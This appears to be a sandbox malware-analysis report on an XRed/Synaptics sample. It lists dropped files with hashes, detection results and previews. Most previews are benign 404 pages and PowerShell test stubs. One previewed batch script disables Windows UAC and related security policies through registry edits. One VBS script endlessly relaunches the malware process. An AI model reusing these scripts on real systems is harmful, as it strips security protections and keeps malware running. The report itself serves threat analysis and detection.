Entropy (8bit):	7.558156580962077
Encrypted:	false
SSDEEP:	49152:onsHyjtk2MYC5GDFhloJfjQiCSAKyHI9K90:onsmtk2aAhl0RC1gj
MD5:	A0177C0A9F2254179B112EECF3C58CC6
SHA1:	03478F572F818C8FFD7F8EBE23632432E82E4461
SHA-256:	55D2BEA108EEAABCDF59D449CF15F0EFABB59E243D9BD91FF0B0805CD3D133DF
SHA-512:	0247F803D5018659899766FE8758C14081B1FE9F414C2AFB8F34E78569BF5E9063B746C3ADF388B60017367070582E7D8B9422AE94BCEF4C8C0D39FA7E4A4470
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: docx.msi, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................z....................@..............................................@..............................B......0q...................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0q.......r..................@..P....................................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\8FCmEXj.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.2659104293383425
Encrypted:	false
SSDEEP:	24:GgsF+0AzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7z+pAZewRDK4mW
MD5:	38042FEB4414CC995CB8424413EC1D17
SHA1:	10C6D1ADF4AC16B3D9E984E829234F3FA943BE7C
SHA-256:	6DBA7F76F1E11260B242C8E4EC595A9D79D7EF07F751CB8360CD587C603CAB13
SHA-512:	F9870AD3CE820660E7CDBA94C4B4DCDB0167010E64DB786B20EA5BEDCBEA1603398BA4FAB5DE11A446A2F9A391A1906ED6B4D631EB4609531CAD0EC62478E288
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3h7jw9NFFD-QT4PsZr_dbA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\BatchByloadStartHid.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	5.289633803958584
Encrypted:	false
SSDEEP:	48:765ijMiUQnQ5IyQ0m3FHY4AJ4tppICkQ865C6H3QBjHQHuHU904:765QMiUQnQ5y1865v
MD5:	45A66AFA3B07B3143F0D0C3515898BAE
SHA1:	CC5BAF0C4D2FC0B034974786F20087E058915693
SHA-256:	8A8C558B5CB169E5D2967DC3E69CB26174BDD8D457903F074477EF1C555B4FB6
SHA-512:	04AEE35C068225EC8982FC273FD4E4E172CF336B26561D5B8C7CCF3FE972C485B962D01BDCFAB2A27FE456364114417DC3C44852D8431DEF9A04812E8008106F
Malicious:	true
Preview:	@echo off..setlocal ENABLEDELAYEDEXPANSION....:: ????? ??????? ?????? ?????..set "cmd_reg=reg.exe ADD"..set "policy_path=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"..set "reg_params=/t REG_DWORD /d 0 /f"..set "ps_cmd=PowerShell -Command"....:: ????? ???????? ?? ??? ????..if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit....:: ????? ????? ????????? ???????? ????????? ?????? ??????..!cmd_reg! !policy_path! /v EnableLUA !reg_params!..!cmd_reg! !policy_path! /v EnableInstallerDetection !reg_params!..!cmd_reg! !policy_path! /v EnableUIADesktopToggle !reg_params!..!cmd_reg! !policy_path! /v EnableVirtualization !reg_params!..!cmd_reg! !policy_path! /v EnableUwpStartupTasks !reg_params!..!cmd_reg! !policy_path! /v EnableSecureUIAPaths !reg_params!..!cmd_reg! !policy_path! /v EnableFullTrustStartupTasks !reg_params!..!cmd_reg! !policy_path! /v EnableCursorSuppression !reg_params!..!cmd_reg! !policy_path! /v DSCAutomationHostEnabled !reg_pa

C:\Users\user\AppData\Local\Temp\IyNazmh.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.254262849019644
Encrypted:	false
SSDEEP:	24:GgsF+0pTcSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
MD5:	D29C41512AA260EC8E0FC81C19A21557
SHA1:	7F27121278CB521C01859BEA679B1F96F985DCC8
SHA-256:	E68A4E6352200808EEFA8C14DD9035DA3D341256452C9441ABD6E555627DFDC8
SHA-512:	11F937C30C5970DB1AF4A6208F43ED4FEB4D02BD8EE848E755E7AA4D331A1C5329C6DEEF3E424C331D38453CDE8234EDC6C3896CDD36F3FD7EDE7FE14879FE13
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ijqGsgQdmZd5safQshEvUA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\MsCzVbC.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.254785567882624
Encrypted:	false
SSDEEP:	24:GgsF+0LISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+P+pAZewRDK4mW
MD5:	716E06CA87800262D572BF7AAEA6D9BE
SHA1:	F32AF0DE57FB3EEB896B8907FBFD56BE5A0BC2F7
SHA-256:	EF0BC7F63965882E8E2D1D1E076225F3F7966540D1C5A7E6823AB8B130A8056F
SHA-512:	97488FBC6288315897CB024303A64AF2693AA6CC442EDE70294BA38477A355FD14F90552FB9E5410C73E6B4A3F51FBE1F95404895EFB87AD19C7C6E52D75FB2F
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wf1YSGxQ5krBu7hXcwccJg">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\TGWEKK.vbs

Download File

Process:	C:\Users\user\Desktop\._cache_DOCX.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	832
Entropy (8bit):	5.3542324894189965
Encrypted:	false
SSDEEP:	24:dF/UFKU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UF/t+G+7xLxe0WABNVIqZaVzgA
MD5:	901A6EC6BC356322EE1BF0B19C08F7F2
SHA1:	F6F436DF1A0072EE4DF860D31414DC218082E9AD
SHA-256:	99E3F84053E21A9F04D26534E2EB784DADC5DDB84F0790704598B3773F4DCDA1
SHA-512:	37709EB3586CCADD6DBD15819741E26B2F1B8DDCDB1B5C27D390FC37CE3A07B0E2EED308BF673FD45015E2D14D312EF304091F99D8C654368A9EB32D504F7689
Malicious:	true
Yara Hits:	Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_DOCX.exe"..fileset = """C:\Users\user\Desktop\._cache_DOCX.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

C:\Users\user\AppData\Local\Temp\U2nK3P8.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.255401949227864
Encrypted:	false
SSDEEP:	24:GgsF+0KSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+N+pAZewRDK4mW
MD5:	9C05A9F8BCFAF1654A618EE652127466
SHA1:	14677DE15553345653B9EC5A25DFEC9F4DF1F218
SHA-256:	73D13862905AA7CA6F2FBE545866C5225C1F2BC129443A7B4ECB45059459807B
SHA-512:	E780C0E0AC8C6C556B686F501920AB625058801C8C84C2017372D2CB228ECC44FB474C681ACBB77447C3CE01271CFCF67C6910B8C8E2E33C5A8A4AE258632234
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="w7VrbEvIgZ_cyh1rxC-ZyA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\WlYEEcT.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.261186724307115
Encrypted:	false
SSDEEP:	24:GgsF+0d0SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+u0+pAZewRDK4mW
MD5:	3A171D044F333E6FE4C12A3545851F31
SHA1:	9CD5143806E20951A3EBF70DA9D5221F86DCE76D
SHA-256:	D150194665B16CD644CBD1B7E412B0B75AF8EFEC87C8A6822D980F09CAA45F00
SHA-512:	6E2907786E4F1F6835687F3B8F59A57200C934A04DDEF07FF2E103525C9773F5AC2BABD02ABD48DE7AFE4FC3D1299E5C0FFFAD20C0A312CEE37204322D21C708
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FRqEtQSLI-xpwzL61Wceug">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\YJZpz8P.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.26619492234935
Encrypted:	false
SSDEEP:	24:GgsF+09SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G+pAZewRDK4mW
MD5:	797D0D57523315CA0F1D98DE4E440CAA
SHA1:	95589F195FD23278DE7B6AB83A4D38DCCC3594C9
SHA-256:	CC594929EF3BAEBBD53645ADF6C3F808CFFBF0D10899E828F8102C7C3F4D1253
SHA-512:	715E3C738F5581BBA0628508C220DA79E0E33E02D246995CA5799921B75C22D06E694325BA3E3C3931EF27F1CEA02F667C2CDC8959DFC0C6742A66669A3674DC
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3iDSucxCAoYeGt2TZ9cXBA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\YsLfjQv.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.252700349607515
Encrypted:	false
SSDEEP:	24:GgsF+0z3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k+pAZewRDK4mW
MD5:	877429EAB1B0CDB09A8C70CE40BB09F8
SHA1:	94222A9E9A972E9DD26C7BF79E0502B164C57625
SHA-256:	4C663E8880828BB17AFB0DFFC94C4F4B015D271FA0EBAAD0F0ADE1FDA2F20018
SHA-512:	6D027C7F4FD4878CCB23CAC312EBF42353ACA69FB41F0FF430201B038AFAF74C6E03F88C2FACCF0F8CD1AC78B678E0FCD92BF16E3A044B4EE917CE39EC621617
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NFsFiGbeNRrlZxCi1Aio7Q">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hoebfca.s2v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2yqwhw3h.aw0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3drdc340.e54.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ucvwsow.5sk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4zyudau.5pz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bm1fcys0.t1o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctos1e10.a1f.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmwhf0r0.d50.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dyuj5k4l.r0u.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5ohaeqc.0kv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hvz5fwgw.q3t.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1nmfw0p.p1d.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ii11nyer.sp2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
